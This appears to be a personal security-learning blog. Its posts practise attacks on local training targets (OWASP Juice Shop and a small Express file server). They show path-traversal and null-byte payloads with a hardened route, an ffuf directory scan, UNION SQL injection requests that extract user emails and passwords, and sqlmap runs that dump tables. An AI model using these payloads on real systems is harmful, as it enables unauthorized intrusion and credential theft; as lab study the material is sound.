Saturday, January 29, 2022

null byte injection prevention


ftp site has public and secret file links

click public file link shows public file

click secret file link, a warning message displays
text in secret file: This is a secret file for admin

try to view files outside the ftp folder: access is denied
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64%2f
is the URL-encoded form of ../../etc/passwd/ (Express percent-decodes the route parameter, so path.join sees the raw ../ segments, resolves them above ftpDir — see the /home/kali/etc/passwd/public.txt line in the log — and the prefix check rejects the result)

try to inject a null byte (%00) to bypass the file type check: the attempt failed. Caveat: the log below shows the literal text %00 in the resolved path with the extension reported as .txt, so that request appears to have been double-encoded (%2500) — it passed both the NUL check and the extension check and only failed because fs.readFile found no such file. A single-encoded %00 is decoded by Express into a real NUL character and is what actually exercises the indexOf('\0') guard.
//logs

Example app listening at http://localhost:8080
/home/kali/Documents/ftp/public.txt .txt
/home/kali/Documents/ftp/secret.md .md
/home/kali/etc/passwd/public.txt .txt
/home/kali/Documents/ftp/secret.md%00.txt .txt
//app.js

// Express app serving the ftp demo on port 8080.
const express = require('express');
const app = express();
const port = 8080;
const path = require('path');

const fs = require('fs');
const http = require('http');

const bodyParser = require('body-parser');

// Accept JSON and form-encoded request bodies app-wide (neither route in
// this file reads req.body, but the middleware is registered globally).
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));

// Views are rendered with ejs; plain .html files go through ejs as well.
app.set('view engine', 'ejs');
app.engine('html', require('ejs').renderFile);

// Landing page that lists the downloadable files (views/ftp.ejs).
app.get('/ftp/', (req, res) => {
    res.render('ftp');
});

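app.get('/ftp/:fileName', function (req, res) {
    // Serve one file from ./ftp. Only ".txt" files that resolve to a path
    // inside the ftp directory are returned; every other request is refused
    // with a 4xx status instead of a 200 carrying a message.
    const ftpDir = path.join(__dirname, "ftp");
    const fileName = req.params.fileName;

    // Express percent-decodes route parameters, so "%2e%2e%2f" arrives as
    // "../" and a single-encoded "%00" arrives as a real NUL byte. Reject NUL
    // before building the path: it is never a valid file-name character and
    // is the classic way to make an extension filter see ".txt" while the
    // OS opens "secret.md".
    if (fileName.includes('\0')) {
        res.status(400).send('trying to breach file type filter?');
        return;
    }

    // path.join normalises ".." segments, so a traversal attempt resolves to
    // a path above ftpDir and fails the containment check below.
    const downloadLink = path.join(ftpDir, fileName);

    console.log(downloadLink, path.extname(downloadLink));

    // Containment check. A bare prefix test (indexOf(ftpDir) === 0) would
    // also accept a sibling directory such as "<dirname>/ftp-old/x.txt"
    // reached through "../ftp-old/x.txt", so the separator after the prefix
    // is required.
    // NOTE(review): readFile still follows symlinks placed inside ftp/;
    // resolve with fs.realpath before this check if that matters.
    if (!downloadLink.startsWith(ftpDir + path.sep)) {
        res.status(403).send('trying to sneak out of the ftp directory?');
        return;
    }

    // Allow-list on the extension of the resolved path; ".md" and anything
    // else is refused.
    if (path.extname(downloadLink) !== ".txt") {
        res.status(403).send('trying to download secret file?');
        return;
    }

    fs.readFile(downloadLink, function (err, data) {
        if (err) {
            // Keep the detail server-side: JSON.stringify(err) would hand the
            // client the absolute server path, errno and syscall.
            console.error('ftp read failed', err.code, downloadLink);
            res.writeHead(404, { 'Content-Type': 'text/plain; charset=utf-8' });
            res.end('not found');
            return;
        }
        // Declare the type so the browser does not sniff the file as HTML.
        res.writeHead(200, {
            'Content-Type': 'text/plain; charset=utf-8',
            'X-Content-Type-Options': 'nosniff'
        });
        res.end(data);
    });

});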

// Start listening once every route above has been registered.
app.listen(port, function () {
    console.log(`Example app listening at http://localhost:${port}`);
});

--------------------
//views/ftp.ejs

<html>

<head>
    <%- include('partials/header'); %>
</head>

<body>
    <div style="margin:100px;">
        <%- include('partials/nav'); %>

            <div class="jumbotron" style="padding:40px;">
                <h3>ftp</h3>
                <%# Both links go through the /ftp/:fileName route in app.js,
                    which holds the .txt-only and directory-containment checks;
                    the secret link is deliberately visible here because hiding
                    a link is not an access control. %>
                <a href="/ftp/public.txt">public txt file</a>
                <a href="/ftp/secret.md">secret md file</a>
            </div>
    </div>
</body>

</html>

reference:

null byte injection

Null Byte Injection is an exploitation technique used to bypass sanity-checking filters by adding URL-encoded null byte characters (%00, i.e. 0x00 in hex) to user-supplied data. The injected byte can alter the intended logic of the application and allow an attacker to gain unauthorized access to system files.

Any web language is exploitable this way if the code does not reject NUL bytes in input or parse file names properly. In C-based runtimes and libraries a null byte terminates a string, so a filter written in a higher-level language can see a name ending in an allowed extension while the underlying file API stops at the NUL and opens the file before it; attackers use this for LFI/RFI (Local and Remote File Inclusion) and for bypassing extension filters, as in the .bak example below.

ftp directory

.md files can be accessed

.bak files are inaccessible

%25%30%30 (equivalently %2500) is the URL-encoded form of the literal text %00: the application decodes it once to %00, and a later decode (presumably by the file-serving layer) turns it into a real NUL byte. Append it to the blocked file name followed by an allowed extension (name.bak%2500.md), and
the file type filter is bypassed: the extension check sees .md while the file lookup stops at the NUL and returns the .bak file
reference:

Friday, January 28, 2022

ffuf directory scanner

almost every path returns Size 1987 (the same 207-word, 30-line body — evidently the single-page app's index returned for any unknown route), so that size is noise and must be filtered out
(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost:3000/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://localhost:3000/#/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

_code                   [Status: 200, Size: 1987, Words: 207, Lines: 30]
                        [Status: 200, Size: 1987, Words: 207, Lines: 30]
.bash_history           [Status: 200, Size: 1987, Words: 207, Lines: 30]
.bashrc                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
.cache                  [Status: 200, Size: 1987, Words: 207, Lines: 30]
.config                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
.cvs                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
.listings               [Status: 200, Size: 1987, Words: 207, Lines: 30]
.mysql_history          [Status: 200, Size: 1987, Words: 207, Lines: 30]
.passwd                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
.htpasswd               [Status: 200, Size: 1987, Words: 207, Lines: 30]
.listing                [Status: 200, Size: 1987, Words: 207, Lines: 30]
.perf                   [Status: 200, Size: 1987, Words: 207, Lines: 30]
.cvsignore              [Status: 200, Size: 1987, Words: 207, Lines: 30]
.htaccess               [Status: 200, Size: 1987, Words: 207, Lines: 30]
.profile                [Status: 200, Size: 1987, Words: 207, Lines: 30]
.forward                [Status: 200, Size: 1987, Words: 207, Lines: 30]
.history                [Status: 200, Size: 1987, Words: 207, Lines: 30]
_cache                  [Status: 200, Size: 1987, Words: 207, Lines: 30]
.sh_history             [Status: 200, Size: 1987, Words: 207, Lines: 30]
_catalogs               [Status: 200, Size: 1987, Words: 207, Lines: 30]
.rhosts                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
.ssh                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
.svn/entries            [Status: 200, Size: 1987, Words: 207, Lines: 30]
.svn                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
_backup                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
.swf                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
_assets                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
_baks                   [Status: 200, Size: 1987, Words: 207, Lines: 30]
_borders                [Status: 200, Size: 1987, Words: 207, Lines: 30]
@                       [Status: 200, Size: 1987, Words: 207, Lines: 30]
.git/HEAD               [Status: 200, Size: 1987, Words: 207, Lines: 30]
.hta                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
_archive                [Status: 200, Size: 1987, Words: 207, Lines: 30]
.web                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
_                       [Status: 200, Size: 1987, Words: 207, Lines: 30]
_admin                  [Status: 200, Size: 1987, Words: 207, Lines: 30]
_ajax                   [Status: 200, Size: 1987, Words: 207, Lines: 30]
_adm                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
.subversion             [Status: 200, Size: 1987, Words: 207, Lines: 30]
_common                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
_conf                   [Status: 200, Size: 1987, Words: 207, Lines: 30]
_config                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
_css                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
_data                   [Status: 200, Size: 1987, Words: 207, Lines: 30]
_database               [Status: 200, Size: 1987, Words: 207, Lines: 30]
_derived                [Status: 200, Size: 1987, Words: 207, Lines: 30]
_dev                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
_dummy                  [Status: 200, Size: 1987, Words: 207, Lines: 30]
_files                  [Status: 200, Size: 1987, Words: 207, Lines: 30]
_flash                  [Status: 200, Size: 1987, Words: 207, Lines: 30]
_fpclass                [Status: 200, Size: 1987, Words: 207, Lines: 30]
_images                 [Status: 200, Size: 1987, Words: 207, Lines: 30]
_img                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
_inc                    [Status: 200, Size: 1987, Words: 207, Lines: 30]
_include                [Status: 200, Size: 1987, Words: 207, Lines: 30]
_includes               [Status: 200, Size: 1987, Words: 207, Lines: 30]
_install                [Status: 200, Size: 1987, Words: 207, Lines: 30]

filter out responses whose size is 1987 (-fs 1987 hides that size; everything that remains is a distinct resource)
┌──(kali㉿kali)-[~]
└─$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://localhost:3000/FUZZ -fs 1987

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://localhost:3000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 1987
________________________________________________

assets                  [Status: 301, Size: 179, Words: 7, Lines: 11]
ftp                     [Status: 200, Size: 11072, Words: 1568, Lines: 357]
promotion               [Status: 200, Size: 6586, Words: 560, Lines: 177]
robots.txt              [Status: 200, Size: 28, Words: 3, Lines: 2]
snippets                [Status: 200, Size: 683, Words: 1, Lines: 1]
video                   [Status: 200, Size: 10075518, Words: 0, Lines: 0]
Video                   [Status: 200, Size: 10075518, Words: 0, Lines: 0]
:: Progress: [4614/4614] :: Job [1/1] :: 140 req/sec :: Duration: [0:00:37] :: Errors: 0 ::

exposed sensitive directory http://localhost:3000/ftp (11072 bytes, 357 lines — likely a directory listing; robots.txt and the two large video responses are also worth a look)
reference:

Tuesday, January 25, 2022

Sant-Tropez : Playgrounds Of Rich and Famous

burp suite union attack owasp juice shop

obtain table names from sqlite_master (queried below under its newer alias sqlite_schema) with a UNION injection; the '')) prefix closes the string and the two parentheses of the original WHERE clause, and the UNION must supply 9 columns to match the original SELECT (sqlmap confirms 9 columns further down)
GET /rest/products/search?q=apple'))UNION%20SELECT%20tbl_name,2,3,4,5,6,7,8,9%20from%20sqlite_schema-- 
 
found Users table in previous step, obtain columns from Users table
GET /rest/products/search?q=apple'))UNION%20SELECT%20sql,2,3,4,5,6,7,8,9%20from%20sqlite_schema-- 

found column name email, password from previous step, obtain login info from Users table
GET /rest/products/search?q=apple'))UNION%20SELECT%20email,password,3,4,5,6,7,8,9%20from%20Users-- 

reference:

sqlite_schema

CREATE TABLE sqlite_schema(
  type text,
  name text,
  tbl_name text,
  rootpage integer,
  sql text
);

Monday, January 24, 2022

sqlmap hack owasp juice shop 2

(kali㉿kali)-[~/Downloads/sqlmap/sqlmap-dev]
└─$ sqlmap -u http://localhost:3000/rest/products/search?q= --dbs --level=3 --risk=3

[23:30:33] [INFO] testing SQLite
[23:30:33] [INFO] confirming SQLite
[23:30:33] [INFO] actively fingerprinting SQLite
[23:30:33] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite

─(kali㉿kali)-[~/Downloads/sqlmap/sqlmap-dev]
└─$ sqlmap -u http://localhost:3000/rest/products/search?q= --schema
        ___
       __H__                                                                        
 ___ ___[.]_____ ___ ___  {1.5.8#stable}                                            
|_ -| . ["]     | .'| . |                                                           
|___|_  [']_|_|_|__,|  _|                                                           
      |_|V...       |_|   http://sqlmap.org                                         

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:36:03 /2022-01-24/

[23:36:04] [WARNING] provided value for parameter 'q' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[23:36:04] [INFO] resuming back-end DBMS 'sqlite' 
[23:36:04] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=') AND 7040=7040 AND ('OyLh' LIKE 'OyLh
---
[23:36:04] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[23:36:04] [INFO] enumerating database management system schema
[23:36:04] [INFO] fetching tables for database: 'SQLite_masterdb'
[23:36:04] [INFO] fetching number of tables for database 'SQLite_masterdb'
[23:36:04] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:36:04] [INFO] retrieved: 20
[23:36:04] [INFO] retrieved: sqlite_sequence
[23:36:07] [INFO] retrieved: Users
[23:36:08] [INFO] retrieved: Addresses
[23:36:10] [INFO] retrieved: Baskets
[23:36:11] [INFO] retrieved: Products
[23:36:12] [INFO] retrieved: BasketItems
[23:36:14] [INFO] retrieved: Captchas
[23:36:15] [INFO] retrieved: Cards
[23:36:16] [INFO] retrieved: Challenges
[23:36:17] [INFO] retrieved: Complaints
[23:36:18] [INFO] retrieved: Deliveries
[23:36:20] [INFO] retrieved: Feedbacks
[23:36:21] [INFO] retrieved: ImageCaptchas
[23:36:23] [INFO] retrieved: Memories
[23:36:25] [INFO] retrieved: PrivacyRequests
[23:36:27] [INFO] retrieved: Quantities
[23:36:28] [INFO] retrieved: Recycles
[23:36:30] [INFO] retrieved: SecurityQuestions
[23:36:32] [INFO] retrieved: SecurityAnswers
[23:36:34] [INFO] retrieved: Wallets
[23:36:35] [INFO] fetched tables: 'SQLite_masterdb.Addresses', 'SQLite_masterdb.SecurityQuestions', 'SQLite_masterdb.Baskets', 'SQLite_masterdb.Captchas', 'SQLite_masterdb.BasketItems', 'SQLite_masterdb.Wallets', 'SQLite_masterdb.Products', 'SQLite_masterdb.sqlite_sequence', 'SQLite_masterdb.Feedbacks', 'SQLite_masterdb.Quantities', 'SQLite_masterdb.Recycles', 'SQLite_masterdb.Cards', 'SQLite_masterdb.Complaints', 'SQLite_masterdb.Users', 'SQLite_masterdb.ImageCaptchas', 'SQLite_masterdb.Deliveries', 'SQLite_masterdb.SecurityAnswers', 'SQLite_masterdb.PrivacyRequests', 'SQLite_masterdb.Challenges', 'SQLite_masterdb.Memories'                                        
[23:36:35] [INFO] retrieved: CREATE TABLE `Addresses` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `fullName` VARCHAR(255), `mobileNum` INTEGER, `zipCode` VARCHAR(255), `streetAddress` VARCHAR(255), `city` VARCHAR(255), `state` VARCHAR(255), `country` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:37:36] [INFO] retrieved: CREATE TABLE `SecurityQuestions` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `question` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL)
[23:38:02] [INFO] retrieved: CREATE TABLE `Baskets` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `coupon` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:38:40] [INFO] retrieved: CREATE TABLE `Captchas` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `captchaId` INTEGER, `captcha` VARCHAR(255), `answer` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL)
[23:39:12] [INFO] retrieved: CREATE TABLE `BasketItems` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `quantity` INTEGER, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `BasketId` INTEGER REFERENCES `Baskets` (`id`) ON DELETE CASCADE ON UPDATE CASCADE, `ProductId` INTEGER REFERENCES `Products` (`id`) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (`BasketId`, `ProductId`))
[23:40:09] [INFO] retrieved: CREATE TABLE `Wallets` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `balance` INTEGER DEFAULT 0, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:40:48] [INFO] retrieved: CREATE TABLE `Products` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `name` VARCHAR(255), `description` VARCHAR(255), `price` DECIMAL, `deluxePrice` DECIMAL, `image` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `deletedAt` DATETIME)
[23:41:30] [INFO] retrieved: CREATE TABLE sqlite_sequence(name,seq)
[23:41:36] [INFO] retrieved: CREATE TABLE `Feedbacks` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `comment` VARCHAR(255), `rating` INTEGER NOT NULL, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:42:18] [INFO] retrieved: CREATE TABLE `Quantities` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `quantity` INTEGER, `limitPerUser` INTEGER DEFAULT NULL, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `ProductId` INTEGER REFERENCES `Products` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:43:03] [INFO] retrieved: CREATE TABLE `Recycles` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `quantity` INTEGER(4), `isPickup` TINYINT(1) DEFAULT 0, `date` DATETIME, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE, `AddressId` INTEGER REFERENCES `Addresses` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:44:03] [INFO] retrieved: CREATE TABLE `Cards` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `fullName` VARCHAR(255), `cardNum` INTEGER, `expMonth` INTEGER, `expYear` INTEGER, `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId` INTEGER REFERENCES `Users` (`id`) ON DELETE SET NULL ON UPDATE CASCADE)
[23:44:50] [INFO] retrieved: CREATE TABLE `Complaints` (`id` INTEGER PRIMARY KEY AUTOINCREMENT, `message` VARCHAR(255), `file` VARCHAR(255), `createdAt` DATETIME NOT NULL, `updatedAt` DATETIME NOT NULL, `UserId`^C


[*] ending @ 23:45:21 /2022-01-24/

reference:

sqlmap hack owasp juice shop

──(kali㉿kali)-[~/Downloads/sqlmap/sqlmap-dev]
└─$ python sqlmap.py -u 'http://localhost:3000/rest/products/search?q=test' -p 'q' --dbms="sqlite" --technique U --prefix "')) " --level 5 --risk 3 --dump-all --no-cast --no-escape --flush
        ___
       __H__                                                                        
 ___ ___[.]_____ ___ ___  {1.6.1.7#dev}                                             
|_ -| . [)]     | .'| . |                                                           
|___|_  ["]_|_|_|__,|  _|                                                           
      |_|V...       |_|   https://sqlmap.org                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:07:08 /2022-01-24/

[23:07:08] [INFO] flushing session file
[23:07:08] [INFO] testing connection to the target URL
[23:07:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[23:07:08] [WARNING] heuristic (basic) test shows that GET parameter 'q' might not be injectable
[23:07:08] [INFO] testing for SQL injection on GET parameter 'q'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] n
[23:07:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:07:13] [INFO] target URL appears to be UNION injectable with 9 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[23:07:27] [INFO] GET parameter 'q' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[23:07:27] [INFO] checking if the injection point on GET parameter 'q' is a false positive
[23:07:28] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'q' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: q (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: q=test'))  UNION ALL SELECT 46,46,46,46,46,'qxxvq'||'fcxvWpdSHxEBGIzlgpIxXNqeYluBvSKJcIwrEBpm'||'qzvvq',46,46,46-- syas
---
[23:07:35] [INFO] testing SQLite
[23:07:35] [INFO] confirming SQLite
[23:07:35] [INFO] actively fingerprinting SQLite
[23:07:35] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[23:07:35] [INFO] sqlmap will dump entries of all tables from all databases now
[23:07:35] [INFO] fetching tables for database: 'SQLite_masterdb'
[23:07:35] [INFO] fetching columns for table 'SecurityQuestions' 
[23:07:35] [INFO] fetching entries for table 'SecurityQuestions'
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','1','Your eld...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','2','Mother's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.189 +00:00','3','Mother's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','4','Father's...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','5','Maternal...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','6','Paternal...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','7','Name of ...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','8','Last nam...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','9','Your ZIP...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','10','Company...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','11','Your fa...
[23:07:35] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','12','Your fa...
[23:07:36] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','13','Number ...
[23:07:36] [INFO] retrieved: '255','2022-01-25 02:53:33.190 +00:00','14','What's ...
Database: <current>                                                                
Table: SecurityQuestions
[14 entries]
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+
| id | 255 | question                                                              | updatedAt                      | createdAt                      |
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+
| 1  | 255 | Your eldest siblings middle name?                                     | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 2  | 255 | Mother's maiden name?                                                 | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 3  | 255 | Mother's birth date? (MM/DD/YY)                                       | 2022-01-25 02:53:33.189 +00:00 | 2022-01-25 02:53:33.189 +00:00 |
| 4  | 255 | Father's birth date? (MM/DD/YY)                                       | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 5  | 255 | Maternal grandmother's first name?                                    | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 6  | 255 | Paternal grandmother's first name?                                    | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 7  | 255 | Name of your favorite pet?                                            | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 8  | 255 | Last name of dentist when you were a teenager? (Do not include 'Dr.') | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 9  | 255 | Your ZIP/postal code when you were a teenager?                        | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 10 | 255 | Company you first work for as an adult?                               | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 11 | 255 | Your favorite book?                                                   | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 12 | 255 | Your favorite movie?                                                  | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 13 | 255 | Number of one of your customer or ID cards?                           | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
| 14 | 255 | What's your favorite place to go hiking?                              | 2022-01-25 02:53:33.190 +00:00 | 2022-01-25 02:53:33.190 +00:00 |
+----+-----+-----------------------------------------------------------------------+--------------------------------+--------------------------------+

[23:07:36] [INFO] table 'SQLite_masterdb.SecurityQuestions' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/SQLite_masterdb/SecurityQuestions.csv'                                                                                 
[23:07:36] [INFO] fetching columns for table 'ImageCaptchas' 
[23:07:36] [INFO] fetching entries for table 'ImageCaptchas'
[23:07:36] [WARNING] unable to retrieve the entries for table 'ImageCaptchas' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Addresses' 
[23:07:36] [INFO] fetching entries for table 'Addresses'
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] unable to retrieve the entries for table 'Addresses' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Recycles' 
[23:07:36] [INFO] fetching entries for table 'Recycles'
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ": syntax error
[23:07:36] [WARNING] unable to retrieve the entries for table 'Recycles' in database 'SQLite_masterdb'
[23:07:36] [INFO] fetching columns for table 'Wallets' 
[23:07:36] [INFO] fetching entries for table 'Wallets'
[23:07:36] [INFO] retrieved: '1','0','2022-01-25 02:53:33.952 +00:00','1','2022-0...
[23:07:36] [INFO] retrieved: '2','100','2022-01-25 02:53:33.952 +00:00','2','2022...
[23:07:36] [INFO] retrieved: '3','0','2022-01-25 02:53:33.952 +00:00','3','2022-0...
[23:07:36] [INFO] retrieved: '4','0','2022-01-25 02:53:33.952 +00:00','4','2022-0...
[23:07:36] [INFO] retrieved: '5','0','2022-01-25 02:53:33.952 +00:00','5','2022-0...
[23:07:36] [INFO] retrieved: '6','0','2022-01-25 02:53:33.952 +00:00','6','2022-0...
[23:07:36] [INFO] retrieved: '7','100','2022-01-25 02:53:33.952 +00:00','7','2022...
[23:07:36] [INFO] retrieved: '8','0','2022-01-25 02:53:33.952 +00:00','8','2022-0...
[23:07:37] [INFO] retrieved: '9','0','2022-01-25 02:53:33.952 +00:00','9','2022-0...
[23:07:37] [INFO] retrieved: '10','0','2022-01-25 02:53:33.952 +00:00','10','2022...
[23:07:37] [INFO] retrieved: '11','0','2022-01-25 02:53:33.952 +00:00','11','2022...
[23:07:37] [INFO] retrieved: '12','0','2022-01-25 02:53:33.952 +00:00','12','2022...
[23:07:37] [INFO] retrieved: '13','0','2022-01-25 02:53:33.952 +00:00','13','2022...
[23:07:37] [INFO] retrieved: '14','0','2022-01-25 02:53:33.953 +00:00','14','2022...
